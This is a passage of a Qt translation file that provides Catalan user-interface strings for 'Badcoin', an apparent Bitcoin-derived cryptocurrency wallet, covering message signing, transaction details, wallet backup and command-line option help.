filename="../sendcoinsentry.cpp" line="+26"/> <source>Enter a label for this address to add it to your address book</source> <translation>Introdueixi una etiquera per a aquesta adreça per afegir-la a la llibreta d&apos;adreces</translation> </message> <message> <location line="-78"/> <source>&amp;Label:</source> <translation>&amp;Etiqueta:</translation> </message> <message> <location line="+28"/> <source>Choose address from address book</source> <translation>Escollir adreça del llibre d&apos;adreces</translation> </message> <message> <location line="+10"/> <source>Alt+A</source> <translation>Alta+A</translation> </message> <message> <location line="+7"/> <source>Paste address from clipboard</source> <translation>Enganxar adreça del porta-retalls</translation> </message> <message> <location line="+10"/> <source>Alt+P</source> <translation>Alt+P</translation> </message> <message> <location line="+7"/> <source>Remove this recipient</source> <translation>Eliminar aquest destinatari</translation> </message> <message> <location filename="../sendcoinsentry.cpp" line="+1"/> <source>Enter a Bitcoin address (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>Introdueixi una adreça de Badcoin (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> </context> <context> <name>SignVerifyMessageDialog</name> <message> <location filename="../forms/signverifymessagedialog.ui" line="+14"/> <source>Signatures - Sign / Verify a Message</source> <translation>Signatures .Signar/Verificar un Missatge</translation> </message> <message> <location line="+13"/> <source>&amp;Sign Message</source> <translation>&amp;Signar Missatge</translation> </message> <message> <location line="+6"/> <source>You can sign messages with your addresses to prove you own them. Be careful not to sign anything vague, as phishing attacks may try to trick you into signing your identity over to them. Only sign fully-detailed statements you agree to.</source> <translation>Pots signar missatges amb la teva adreça per provar que són teus. Sigues cautelòs al signar qualsevol cosa, ja que els atacs phising poden intentar confondre&apos;t per a que els hi signis amb la teva identitat. Tan sols signa als documents completament detallats amb els que hi estàs d&apos;acord.</translation> </message> <message> <location line="+18"/> <source>The address to sign the message with (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>La adreça amb la que signat els missatges (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="+10"/> <location line="+213"/> <source>Choose an address from the address book</source> <translation>Escollir una adreça de la llibreta de direccions</translation> </message> <message> <location line="-203"/> <location line="+213"/> <source>Alt+A</source> <translation>Alta+A</translation> </message> <message> <location line="-203"/> <source>Paste address from clipboard</source> <translation>Enganxar adreça del porta-retalls</translation> </message> <message> <location line="+10"/> <source>Alt+P</source> <translation>Alt+P</translation> </message> <message> <location line="+12"/> <source>Enter the message you want to sign here</source> <translation>Introdueix aqui el missatge que vols signar</translation> </message> <message> <location line="+7"/> <source>Signature</source> <translation>Signatura</translation> </message> <message> <location line="+27"/> <source>Copy the current signature to the system clipboard</source> <translation>Copiar la signatura actual al porta-retalls del sistema</translation> </message> <message> <location line="+21"/> <source>Sign the message to prove you own this Bitcoin address</source> <translation>Signa el missatge per provar que ets propietari d&apos;aquesta adreça Badcoin</translation> </message> <message> <location line="+3"/> <source>Sign &amp;Message</source> <translation>Signar &amp;Missatge</translation> </message> <message> <location line="+14"/> <source>Reset all sign message fields</source> <translation>Neteja tots els camps de clau</translation> </message> <message> <location line="+3"/> <location line="+146"/> <source>Clear &amp;All</source> <translation>Esborrar &amp;Tot</translation> </message> <message> <location line="-87"/> <source>&amp;Verify Message</source> <translation>&amp;Verificar el missatge</translation> </message> <message> <location line="+6"/> <source>Enter the signing address, message (ensure you copy line breaks, spaces, tabs, etc. exactly) and signature below to verify the message. Be careful not to read more into the signature than what is in the signed message itself, to avoid being tricked by a man-in-the-middle attack.</source> <translation>Introdueixi l&apos;adreça signant, missatge (assegura&apos;t que copies salts de línia, espais, tabuladors, etc excactament tot el text) i la signatura a sota per verificar el missatge. Per evitar ser enganyat per un atac home-entre-mig, vés amb compte de no llegir més en la signatura del que hi ha al missatge signat mateix.</translation> </message> <message> <location line="+21"/> <source>The address the message was signed with (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>La adreça amb el que el missatge va ser signat (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="+40"/> <source>Verify the message to ensure it was signed with the specified Bitcoin address</source> <translation>Verificar el missatge per assegurar-se que ha estat signat amb una adreça Badcoin específica</translation> </message> <message> <location line="+3"/> <source>Verify &amp;Message</source> <translation>Verificar &amp;Missatge</translation> </message> <message> <location line="+14"/> <source>Reset all verify message fields</source> <translation>Neteja tots els camps de verificació de missatge</translation> </message> <message> <location filename="../signverifymessagedialog.cpp" line="+27"/> <location line="+3"/> <source>Enter a Bitcoin address (e.g. 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</source> <translation>Introdueixi una adreça de Badcoin (per exemple 1NS17iag9jJgTHD1VXjvLCEnZuQ3rJDE9L)</translation> </message> <message> <location line="-2"/> <source>Click &quot;Sign Message&quot; to generate signature</source> <translation>Clica &quot;Signar Missatge&quot; per a generar una signatura</translation> </message> <message> <location line="+3"/> <source>Enter Bitcoin signature</source> <translation>Introduïr una clau Badcoin</translation> </message> <message> <location line="+82"/> <location line="+81"/> <source>The entered address is invalid.</source> <translation>L&apos;adreça intoduïda és invàlida.</translation> </message> <message> <location line="-81"/> <location line="+8"/> <location line="+73"/> <location line="+8"/> <source>Please check the address and try again.</source> <translation>Siu us plau, comprovi l&apos;adreça i provi de nou.</translation> </message> <message> <location line="-81"/> <location line="+81"/> <source>The entered address does not refer to a key.</source> <translation>L&apos;adreça introduïda no referencia a cap clau.</translation> </message> <message> <location line="-73"/> <source>Wallet unlock was cancelled.</source> <translation>El desbloqueig del moneder ha estat cancelat.</translation> </message> <message> <location line="+8"/> <source>Private key for the entered address is not available.</source> <translation>La clau privada per a la adreça introduïda no està disponible.</translation> </message> <message> <location line="+12"/> <source>Message signing failed.</source> <translation>El signat del missatge ha fallat.</translation> </message> <message> <location line="+5"/> <source>Message signed.</source> <translation>Missatge signat.</translation> </message> <message> <location line="+59"/> <source>The signature could not be decoded.</source> <translation>La signatura no s&apos;ha pogut decodificar .</translation> </message> <message> <location line="+0"/> <location line="+13"/> <source>Please check the signature and try again.</source> <translation>Su us plau, comprovi la signatura i provi de nou.</translation> </message> <message> <location line="+0"/> <source>The signature did not match the message digest.</source> <translation>La signatura no coincideix amb el resum del missatge.</translation> </message> <message> <location line="+7"/> <source>Message verification failed.</source> <translation>Ha fallat la verificació del missatge.</translation> </message> <message> <location line="+5"/> <source>Message verified.</source> <translation>Missatge verificat.</translation> </message> </context> <context> <name>SplashScreen</name> <message> <location filename="../splashscreen.cpp" line="+22"/> <source>The Bitcoin developers</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>[testnet]</source> <translation type="unfinished"/> </message> </context> <context> <name>TransactionDesc</name> <message> <location filename="../transactiondesc.cpp" line="+20"/> <source>Open until %1</source> <translation>Obert fins %1</translation> </message> <message> <location line="+6"/> <source>%1/offline</source> <translation>%1/offline</translation> </message> <message> <location line="+2"/> <source>%1/unconfirmed</source> <translation>%1/sense confirmar</translation> </message> <message> <location line="+2"/> <source>%1 confirmations</source> <translation>%1 confrimacions</translation> </message> <message> <location line="+18"/> <source>Status</source> <translation>Estat</translation> </message> <message numerus="yes"> <location line="+7"/> <source>, broadcast through %n node(s)</source> <translation><numerusform>, difusió a través de %n node</numerusform><numerusform>, difusió a través de %n nodes</numerusform></translation> </message> <message> <location line="+4"/> <source>Date</source> <translation>Data</translation> </message> <message> <location line="+7"/> <source>Source</source> <translation>Font</translation> </message> <message> <location line="+0"/> <source>Generated</source> <translation>Generat</translation> </message> <message> <location line="+5"/> <location line="+17"/> <source>From</source> <translation>Des de</translation> </message> <message> <location line="+1"/> <location line="+22"/> <location line="+58"/> <source>To</source> <translation>A</translation> </message> <message> <location line="-77"/> <location line="+2"/> <source>own address</source> <translation>Adreça pròpia</translation> </message> <message> <location line="-2"/> <source>label</source> <translation>etiqueta</translation> </message> <message> <location line="+37"/> <location line="+12"/> <location line="+45"/> <location line="+17"/> <location line="+30"/> <source>Credit</source> <translation>Crèdit</translation> </message> <message numerus="yes"> <location line="-102"/> <source>matures in %n more block(s)</source> <translation><numerusform>disponible en %n bloc més</numerusform><numerusform>disponibles en %n blocs més</numerusform></translation> </message> <message> <location line="+2"/> <source>not accepted</source> <translation>no acceptat</translation> </message> <message> <location line="+44"/> <location line="+8"/> <location line="+15"/> <location line="+30"/> <source>Debit</source> <translation>Dèbit</translation> </message> <message> <location line="-39"/> <source>Transaction fee</source> <translation>Comissió de transacció</translation> </message> <message> <location line="+16"/> <source>Net amount</source> <translation>Quantitat neta</translation> </message> <message> <location line="+6"/> <source>Message</source> <translation>Missatge</translation> </message> <message> <location line="+2"/> <source>Comment</source> <translation>Comentar</translation> </message> <message> <location line="+2"/> <source>Transaction ID</source> <translation>ID de transacció</translation> </message> <message> <location line="+3"/> <source>Generated coins must mature 120 blocks before they can be spent. When you generated this block, it was broadcast to the network to be added to the block chain. If it fails to get into the chain, its state will change to &quot;not accepted&quot; and it won&apos;t be spendable. This may occasionally happen if another node generates a block within a few seconds of yours.</source> <translation>Les monedes generades han de madurar 120 blocs abans de poder ser gastades. Quan has generat aquest bloc, aquest ha estat transmés a la xarxa per a ser afegit a la cadena de blocs. Si no arriba a ser acceptat a la cadena, el seu estat passará a &quot;no acceptat&quot; i no podrá ser gastat. Això pot ocòrrer ocasionalment si un altre node genera un bloc a pocs segons del teu.</translation> </message> <message> <location line="+7"/> <source>Debug information</source> <translation>Informació de debug</translation> </message> <message> <location line="+8"/> <source>Transaction</source> <translation>Transacció</translation> </message> <message> <location line="+3"/> <source>Inputs</source> <translation>Entrades</translation> </message> <message> <location line="+23"/> <source>Amount</source> <translation>Quantitat</translation> </message> <message> <location line="+1"/> <source>true</source> <translation>cert</translation> </message> <message> <location line="+0"/> <source>false</source> <translation>fals</translation> </message> <message> <location line="-209"/> <source>, has not been successfully broadcast yet</source> <translation>, encara no ha estat emès correctement</translation> </message> <message numerus="yes"> <location line="-35"/> <source>Open for %n more block(s)</source> <translation><numerusform>Obre per %n bloc més</numerusform><numerusform>Obre per %n blocs més</numerusform></translation> </message> <message> <location line="+70"/> <source>unknown</source> <translation>desconegut</translation> </message> </context> <context> <name>TransactionDescDialog</name> <message> <location filename="../forms/transactiondescdialog.ui" line="+14"/> <source>Transaction details</source> <translation>Detall de la transacció</translation> </message> <message> <location line="+6"/> <source>This pane shows a detailed description of the transaction</source> <translation>Aquest panell mostra una descripció detallada de la transacció</translation> </message> </context> <context> <name>TransactionTableModel</name> <message> <location filename="../transactiontablemodel.cpp" line="+225"/> <source>Date</source> <translation>Data</translation> </message> <message> <location line="+0"/> <source>Type</source> <translation>Tipus</translation> </message> <message> <location line="+0"/> <source>Address</source> <translation>Direcció</translation> </message> <message> <location line="+0"/> <source>Amount</source> <translation>Quantitat</translation> </message> <message numerus="yes"> <location line="+57"/> <source>Open for %n more block(s)</source> <translation><numerusform>Obre per %n bloc més</numerusform><numerusform>Obre per %n blocs més</numerusform></translation> </message> <message> <location line="+3"/> <source>Open until %1</source> <translation>Obert fins %1</translation> </message> <message> <location line="+3"/> <source>Offline (%1 confirmations)</source> <translation>Sense connexió (%1 confirmacions)</translation> </message> <message> <location line="+3"/> <source>Unconfirmed (%1 of %2 confirmations)</source> <translation>Sense confirmar (%1 de %2 confirmacions)</translation> </message> <message> <location line="+3"/> <source>Confirmed (%1 confirmations)</source> <translation>Confirmat (%1 confirmacions)</translation> </message> <message numerus="yes"> <location line="+8"/> <source>Mined balance will be available when it matures in %n more block(s)</source> <translation><numerusform>El saldo recent minat estarà disponible quan venci el termini en %n bloc més</numerusform><numerusform>El saldo recent minat estarà disponible quan venci el termini en %n blocs més</numerusform></translation> </message> <message> <location line="+5"/> <source>This block was not received by any other nodes and will probably not be accepted!</source> <translation>Aquest bloc no ha estat rebut per cap altre node i probablement no serà acceptat!</translation> </message> <message> <location line="+3"/> <source>Generated but not accepted</source> <translation>Generat però no acceptat</translation> </message> <message> <location line="+43"/> <source>Received with</source> <translation>Rebut amb</translation> </message> <message> <location line="+2"/> <source>Received from</source> <translation>Rebut de</translation> </message> <message> <location line="+3"/> <source>Sent to</source> <translation>Enviat a</translation> </message> <message> <location line="+2"/> <source>Payment to yourself</source> <translation>Pagament a un mateix</translation><|fim▁hole|> <message> <location line="+2"/> <source>Mined</source> <translation>Minat</translation> </message> <message> <location line="+38"/> <source>(n/a)</source> <translation>(n/a)</translation> </message> <message> <location line="+199"/> <source>Transaction status. Hover over this field to show number of confirmations.</source> <translation>Estat de la transacció. Desplaça&apos;t per aquí sobre per mostrar el nombre de confirmacions.</translation> </message> <message> <location line="+2"/> <source>Date and time that the transaction was received.</source> <translation>Data i hora en que la transacció va ser rebuda.</translation> </message> <message> <location line="+2"/> <source>Type of transaction.</source> <translation>Tipus de transacció.</translation> </message> <message> <location line="+2"/> <source>Destination address of transaction.</source> <translation>Adreça del destinatari de la transacció.</translation> </message> <message> <location line="+2"/> <source>Amount removed from or added to balance.</source> <translation>Quantitat extreta o afegida del balanç.</translation> </message> </context> <context> <name>TransactionView</name> <message> <location filename="../transactionview.cpp" line="+52"/> <location line="+16"/> <source>All</source> <translation>Tot</translation> </message> <message> <location line="-15"/> <source>Today</source> <translation>Avui</translation> </message> <message> <location line="+1"/> <source>This week</source> <translation>Aquesta setmana</translation> </message> <message> <location line="+1"/> <source>This month</source> <translation>Aquest mes</translation> </message> <message> <location line="+1"/> <source>Last month</source> <translation>El mes passat</translation> </message> <message> <location line="+1"/> <source>This year</source> <translation>Enguany</translation> </message> <message> <location line="+1"/> <source>Range...</source> <translation>Rang...</translation> </message> <message> <location line="+11"/> <source>Received with</source> <translation>Rebut amb</translation> </message> <message> <location line="+2"/> <source>Sent to</source> <translation>Enviat a</translation> </message> <message> <location line="+2"/> <source>To yourself</source> <translation>A tu mateix</translation> </message> <message> <location line="+1"/> <source>Mined</source> <translation>Minat</translation> </message> <message> <location line="+1"/> <source>Other</source> <translation>Altres</translation> </message> <message> <location line="+7"/> <source>Enter address or label to search</source> <translation>Introdueix una adreça o una etiqueta per cercar</translation> </message> <message> <location line="+7"/> <source>Min amount</source> <translation>Quantitat mínima</translation> </message> <message> <location line="+34"/> <source>Copy address</source> <translation>Copiar adreça </translation> </message> <message> <location line="+1"/> <source>Copy label</source> <translation>Copiar etiqueta</translation> </message> <message> <location line="+1"/> <source>Copy amount</source> <translation>Copiar quantitat</translation> </message> <message> <location line="+1"/> <source>Copy transaction ID</source> <translation>Copiar ID de transacció</translation> </message> <message> <location line="+1"/> <source>Edit label</source> <translation>Editar etiqueta</translation> </message> <message> <location line="+1"/> <source>Show transaction details</source> <translation>Mostra detalls de la transacció</translation> </message> <message> <location line="+139"/> <source>Export Transaction Data</source> <translation>Exportar detalls de la transacció </translation> </message> <message> <location line="+1"/> <source>Comma separated file (*.csv)</source> <translation>Arxiu de separació per comes (*.csv)</translation> </message> <message> <location line="+8"/> <source>Confirmed</source> <translation>Confirmat</translation> </message> <message> <location line="+1"/> <source>Date</source> <translation>Data</translation> </message> <message> <location line="+1"/> <source>Type</source> <translation>Tipus</translation> </message> <message> <location line="+1"/> <source>Label</source> <translation>Etiqueta</translation> </message> <message> <location line="+1"/> <source>Address</source> <translation>Direcció</translation> </message> <message> <location line="+1"/> <source>Amount</source> <translation>Quantitat</translation> </message> <message> <location line="+1"/> <source>ID</source> <translation>ID</translation> </message> <message> <location line="+4"/> <source>Error exporting</source> <translation>Error en l&apos;exportació</translation> </message> <message> <location line="+0"/> <source>Could not write to file %1.</source> <translation>No s&apos;ha pogut escriure a l&apos;arxiu %1.</translation> </message> <message> <location line="+100"/> <source>Range:</source> <translation>Rang:</translation> </message> <message> <location line="+8"/> <source>to</source> <translation>a</translation> </message> </context> <context> <name>WalletModel</name> <message> <location filename="../walletmodel.cpp" line="+193"/> <source>Send Coins</source> <translation>Enviar monedes</translation> </message> </context> <context> <name>WalletView</name> <message> <location filename="../walletview.cpp" line="+42"/> <source>&amp;Export</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Export the data in the current tab to a file</source> <translation type="unfinished"/> </message> <message> <location line="+193"/> <source>Backup Wallet</source> <translation>Realitzar còpia de seguretat del moneder</translation> </message> <message> <location line="+0"/> <source>Wallet Data (*.dat)</source> <translation>Dades del moneder (*.dat)</translation> </message> <message> <location line="+3"/> <source>Backup Failed</source> <translation>Còpia de seguretat faillida</translation> </message> <message> <location line="+0"/> <source>There was an error trying to save the wallet data to the new location.</source> <translation>Hi ha hagut un error intentant desar les dades del moneder al nou directori</translation> </message> <message> <location line="+4"/> <source>Backup Successful</source> <translation>Copia de seguretat realitzada correctament</translation> </message> <message> <location line="+0"/> <source>The wallet data was successfully saved to the new location.</source> <translation>Les dades del moneder han estat desades cirrectament al nou emplaçament.</translation> </message> </context> <context> <name>bitcoin-core</name> <message> <location filename="../bitcoinstrings.cpp" line="+94"/> <source>Bitcoin version</source> <translation>Versió de Badcoin</translation> </message> <message> <location line="+102"/> <source>Usage:</source> <translation>Ús:</translation> </message> <message> <location line="-29"/> <source>Send command to -server or BadCoind</source> <translation>Enviar comanda a -servidor o badcoind</translation> </message> <message> <location line="-23"/> <source>List commands</source> <translation>Llista d&apos;ordres</translation> </message> <message> <location line="-12"/> <source>Get help for a command</source> <translation>Obtenir ajuda per a un ordre.</translation> </message> <message> <location line="+24"/> <source>Options:</source> <translation>Opcions:</translation> </message> <message> <location line="+24"/> <source>Specify configuration file (default: bitcoin.conf)</source> <translation>Especificat arxiu de configuració (per defecte: badcoin.conf)</translation> </message> <message> <location line="+3"/> <source>Specify pid file (default: BadCoind.pid)</source> <translation>Especificar arxiu pid (per defecte: badcoind.pid)</translation> </message> <message> <location line="-1"/> <source>Specify data directory</source> <translation>Especificar directori de dades</translation> </message> <message> <location line="-9"/> <source>Set database cache size in megabytes (default: 25)</source> <translation>Establir tamany de la memoria cau en megabytes (per defecte: 25)</translation> </message> <message> <location line="-28"/> <source>Listen for connections on &lt;port&gt; (default: 11061 or testnet: 5744)</source> <translation>Escoltar connexions a &lt;port&gt; (per defecte: 11061 o testnet: 5744)</translation> </message> <message> <location line="+5"/> <source>Maintain at most &lt;n&gt; connections to peers (default: 125)</source> <translation>Mantenir com a molt &lt;n&gt; connexions a peers (per defecte: 125)</translation> </message> <message> <location line="-48"/> <source>Connect to a node to retrieve peer addresses, and disconnect</source> <translation>Connectar al node per obtenir les adreces de les connexions, i desconectar</translation> </message> <message> <location line="+82"/> <source>Specify your own public address</source> <translation>Especificar la teva adreça pública</translation> </message> <message> <location line="+3"/> <source>Threshold for disconnecting misbehaving peers (default: 100)</source> <translation>Límit per a desconectar connexions errònies (per defecte: 100)</translation> </message> <message> <location line="-134"/> <source>Number of seconds to keep misbehaving peers from reconnecting (default: 86400)</source> <translation>Nombre de segons abans de reconectar amb connexions errònies (per defecte: 86400)</translation> </message> <message> <location line="-29"/> <source>An error occurred while setting up the RPC port %u for listening on IPv4: %s</source> <translation>Ha sorgit un error al configurar el port RPC %u escoltant a IPv4: %s</translation> </message> <message> <location line="+27"/> <source>Listen for JSON-RPC connections on &lt;port&gt; (default: 21061 or testnet: 5745)</source> <translation>Escoltar connexions JSON-RPC al port &lt;port&gt; (per defecte: 21061 o testnet:5745)</translation> </message> <message> <location line="+37"/> <source>Accept command line and JSON-RPC commands</source> <translation>Acceptar línia d&apos;ordres i ordres JSON-RPC </translation> </message> <message> <location line="+76"/> <source>Run in the background as a daemon and accept commands</source> <translation>Executar en segon pla com a programa dimoni i acceptar ordres</translation> </message> <message> <location line="+37"/> <source>Use the test network</source> <translation>Usar la xarxa de prova</translation> </message> <message> <location line="-112"/> <source>Accept connections from outside (default: 1 if no -proxy or -connect)</source> <translation>Aceptar connexions d&apos;afora (per defecte: 1 si no -proxy o -connect)</translation> </message> <message> <location line="-80"/> <source>%s, you must set a rpcpassword in the configuration file: %s It is recommended you use the following random password: rpcuser=bitcoinrpc rpcpassword=%s (you do not need to remember this password) The username and password MUST NOT be the same. If the file does not exist, create it with owner-readable-only file permissions. It is also recommended to set alertnotify so you are notified of problems; for example: alertnotify=echo %%s | mail -s &quot;Bitcoin Alert&quot; [email protected] </source> <translation>%s has de establir una contrasenya RPC a l&apos;arxiu de configuració:\n%s\nEs recomana que useu la següent constrasenya aleatòria:\nrpcuser=badcoinrpc\nrpcpassword=%s\n(no necesiteu recordar aquesta contrsenya)\nEl nom d&apos;usuari i contrasenya NO HAN de ser els mateixos.\nSi l&apos;arxiu no existeix, crea&apos;l amb els permisos d&apos;arxiu de només lectura per al propietari.\nTambé es recomana establir la notificació d&apos;alertes i així seràs notificat de les incidències;\nper exemple: alertnotify=echo %%s | mail -s &quot;Badcoin Alert&quot; [email protected]</translation> </message> <message> <location line="+17"/> <source>An error occurred while setting up the RPC port %u for listening on IPv6, falling back to IPv4: %s</source> <translation>Ha sorgit un error al configurar el port RPC %u escoltant a IPv6, retrocedint a IPv4: %s</translation> </message> <message> <location line="+3"/> <source>Bind to given address and always listen on it. Use [host]:port notation for IPv6</source> <translation>Vincular a una adreça específica i sempre escoltar-hi. Utilitza la notació [host]:port per IPv6</translation> </message> <message> <location line="+3"/> <source>Cannot obtain a lock on data directory %s. Bitcoin is probably already running.</source> <translation>No es pot bloquejar el directori de dades %s. Probablement Badcoin ja estigui en execució.</translation> </message> <message> <location line="+3"/> <source>Error: The transaction was rejected! This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source> <translation>Error: La transacció ha estat rebutjada. Això pot passar si alguna de les monedes del teu moneder ja s&apos;han gastat, com si haguesis usat una copia de l&apos;arxiu wallet.dat i s&apos;haguessin gastat monedes de la copia però sense marcar com gastades en aquest.</translation> </message> <message> <location line="+4"/> <source>Error: This transaction requires a transaction fee of at least %s because of its amount, complexity, or use of recently received funds!</source> <translation>Error: Aquesta transacció requereix una comissió d&apos;almenys %s degut al seu import, complexitat o per l&apos;ús de fons recentment rebuts!</translation> </message> <message> <location line="+3"/> <source>Execute command when a relevant alert is received (%s in cmd is replaced by message)</source> <translation>Executar ordre al rebre una alerta rellevant (%s al cmd es reemplaça per message)</translation> </message> <message> <location line="+3"/> <source>Execute command when a wallet transaction changes (%s in cmd is replaced by TxID)</source> <translation>Executar una ordre quan una transacció del moneder canviï (%s in cmd es canvia per TxID)</translation> </message> <message> <location line="+11"/> <source>Set maximum size of high-priority/low-fee transactions in bytes (default: 27000)</source> <translation>Establir una mida màxima de transaccions d&apos;alta prioritat/baixa comisió en bytes (per defecte: 27000)</translation> </message> <message> <location line="+6"/> <source>This is a pre-release test build - use at your own risk - do not use for mining or merchant applications</source> <translation>Aquesta és una versió de pre-llançament - utilitza-la sota la teva responsabilitat - No usar per a minería o aplicacions de compra-venda</translation> </message> <message> <location line="+5"/> <source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source> <translation>Advertència: el -paytxfee és molt elevat! Aquesta és la comissió de transacció que pagaràs quan enviis una transacció.</translation> </message> <message> <location line="+3"/> <source>Warning: Displayed transactions may not be correct! You may need to upgrade, or other nodes may need to upgrade.</source> <translation>Advertència: Les transaccions mostrades poden no ser correctes! Pot esser que necessitis actualitzar, o bé que altres nodes ho necessitin.</translation> </message> <message> <location line="+3"/> <source>Warning: Please check that your computer&apos;s date and time are correct! If your clock is wrong Bitcoin will not work properly.</source> <translation>Advertència: Si us plau comprovi que la data i hora del seu computador siguin correctes! Si el seu rellotge està mal configurat, Badcoin no funcionará de manera apropiada.</translation> </message> <message> <location line="+3"/> <source>Warning: error reading wallet.dat! All keys read correctly, but transaction data or address book entries might be missing or incorrect.</source> <translation>Advertència: Error llegint l&apos;arxiu wallet.dat!! Totes les claus es llegeixen correctament, però hi ha dades de transaccions o entrades del llibre d&apos;adreces absents o bé son incorrectes.</translation> </message> <message> <location line="+3"/> <source>Warning: wallet.dat corrupt, data salvaged! Original wallet.dat saved as wallet.{timestamp}.bak in %s; if your balance or transactions are incorrect you should restore from a backup.</source> <translation>Advertència: L&apos;arxiu wallet.dat és corrupte, dades rescatades! L&apos;arxiu wallet.dat original ha estat desat com wallet.{estampa_temporal}.bak al directori %s; si el teu balanç o transaccions son incorrectes hauries de restaurar-lo de un backup.</translation> </message> <message> <location line="+14"/> <source>Attempt to recover private keys from a corrupt wallet.dat</source> <translation>Intentar recuperar les claus privades d&apos;un arxiu wallet.dat corrupte</translation> </message> <message> <location line="+2"/> <source>Block creation options:</source> <translation>Opcions de la creació de blocs:</translation> </message> <message> <location line="+5"/> <source>Connect only to the specified node(s)</source> <translation>Connectar només al(s) node(s) especificats</translation> </message> <message> <location line="+3"/> <source>Corrupted block database detected</source> <translation>S&apos;ha detectat una base de dades de blocs corrupta</translation> </message> <message> <location line="+1"/> <source>Discover own IP address (default: 1 when listening and no -externalip)</source> <translation>Descobrir la pròpia adreça IP (per defecte: 1 quan escoltant i no -externalip)</translation> </message> <message> <location line="+1"/> <source>Do you want to rebuild the block database now?</source> <translation>Vols reconstruir la base de dades de blocs ara?</translation> </message> <message> <location line="+2"/> <source>Error initializing block database</source> <translation>Error carregant la base de dades de blocs</translation> </message> <message> <location line="+1"/> <source>Error initializing wallet database environment %s!</source> <translation>Error inicialitzant l&apos;entorn de la base de dades del moneder %s!</translation> </message> <message> <location line="+1"/> <source>Error loading block database</source> <translation>Error carregant la base de dades del bloc</translation> </message> <message> <location line="+4"/> <source>Error opening block database</source> <translation>Error obrint la base de dades de blocs</translation> </message> <message> <location line="+2"/> <source>Error: Disk space is low!</source> <translation>Error: Espai al disc baix!</translation> </message> <message> <location line="+1"/> <source>Error: Wallet locked, unable to create transaction!</source> <translation>Error: El moneder està blocat, no és possible crear la transacció!</translation> </message> <message> <location line="+1"/> <source>Error: system error: </source> <translation>Error: error de sistema:</translation> </message> <message> <location line="+1"/> <source>Failed to listen on any port. Use -listen=0 if you want this.</source> <translation>Error al escoltar a qualsevol port. Utilitza -listen=0 si vols això.</translation> </message> <message> <location line="+1"/> <source>Failed to read block info</source> <translation>Ha fallat la lectura de la informació del bloc</translation> </message> <message> <location line="+1"/> <source>Failed to read block</source> <translation>Ha fallat la lectura del bloc</translation> </message> <message> <location line="+1"/> <source>Failed to sync block index</source> <translation>Ha fallat la sincronització de l&apos;índex de bloc</translation> </message> <message> <location line="+1"/> <source>Failed to write block index</source> <translation>Ha fallat la escriptura de l&apos;índex de blocs</translation> </message> <message> <location line="+1"/> <source>Failed to write block info</source> <translation>Ha fallat la escriptura de la informació de bloc</translation> </message> <message> <location line="+1"/> <source>Failed to write block</source> <translation>Ha fallat l&apos;escriptura del bloc</translation> </message> <message> <location line="+1"/> <source>Failed to write file info</source> <translation>Ha fallat l&apos;escriptura de l&apos;arxiu info</translation> </message> <message> <location line="+1"/> <source>Failed to write to coin database</source> <translation>Ha fallat l&apos;escriptura de la basse de dades de monedes</translation> </message> <message> <location line="+1"/> <source>Failed to write transaction index</source> <translation>Ha fallat l&apos;escriptura de l&apos;índex de transaccions</translation> </message> <message> <location line="+1"/> <source>Failed to write undo data</source> <translation>Ha fallat el desfer de dades</translation> </message> <message> <location line="+2"/> <source>Find peers using DNS lookup (default: 1 unless -connect)</source> <translation>Cerca punts de connexió usant rastreig de DNS (per defecte: 1 tret d&apos;usar -connect)</translation> </message> <message> <location line="+1"/> <source>Generate coins (default: 0)</source> <translation type="unfinished"/> </message> <message> <location line="+2"/> <source>How many blocks to check at startup (default: 288, 0 = all)</source> <translation>Quants blocs s&apos;han de confirmar a l&apos;inici (per defecte: 288, 0 = tots)</translation> </message> <message> <location line="+1"/> <source>How thorough the block verification is (0-4, default: 3)</source> <translation>Com verificar el bloc (0-4, per defecte 3)</translation> </message> <message> <location line="+19"/> <source>Not enough file descriptors available.</source> <translation type="unfinished"/> </message> <message> <location line="+8"/> <source>Rebuild block chain index from current blk000??.dat files</source> <translation>Reconstruir l&apos;índex de la cadena de blocs dels arxius actuals blk000??.dat</translation> </message> <message> <location line="+16"/> <source>Set the number of threads to service RPC calls (default: 4)</source> <translation>Estableix el nombre de fils per atendre trucades RPC (per defecte: 4)</translation> </message> <message> <location line="+26"/> <source>Verifying blocks...</source> <translation>Verificant blocs...</translation> </message> <message> <location line="+1"/> <source>Verifying wallet...</source> <translation>Verificant moneder...</translation> </message> <message> <location line="-69"/> <source>Imports blocks from external blk000??.dat file</source> <translation>Importa blocs de un fitxer blk000??.dat extern</translation> </message> <message> <location line="-76"/> <source>Set the number of script verification threads (up to 16, 0 = auto, &lt;0 = leave that many cores free, default: 0)</source> <translation type="unfinished"/> </message> <message> <location line="+77"/> <source>Information</source> <translation>&amp;Informació</translation> </message> <message> <location line="+3"/> <source>Invalid -tor address: &apos;%s&apos;</source> <translation>Adreça -tor invàlida: &apos;%s&apos;</translation> </message> <message> <location line="+1"/> <source>Invalid amount for -minrelaytxfee=&lt;amount&gt;: &apos;%s&apos;</source> <translation type="unfinished"/> </message> <message> <location line="+1"/> <source>Invalid amount for -mintxfee=&lt;amount&gt;: &apos;%s&apos;</source> <translation type="unfinished"/> </message> <message> <location line="+8"/> <source>Maintain a full transaction index (default: 0)</source> <translation>Mantenir tot l&apos;índex de transaccions (per defecte: 0)</translation> </message> <message> <location line="+2"/> <source>Maximum per-connection receive buffer, &lt;n&gt;*1000 bytes (default: 5000)</source> <translation>Mida màxima del buffer de recepció per a cada connexió, &lt;n&gt;*1000 bytes (default: 5000)</translation> </message> <message> <location line="+1"/> <source>Maximum per-connection send buffer, &lt;n&gt;*1000 bytes (default: 1000)</source> <translation>Mida màxima del buffer d&apos;enviament per a cada connexió, &lt;n&gt;*1000 bytes (default: 5000)</translation> </message> <message> <location line="+2"/> <source>Only accept block chain 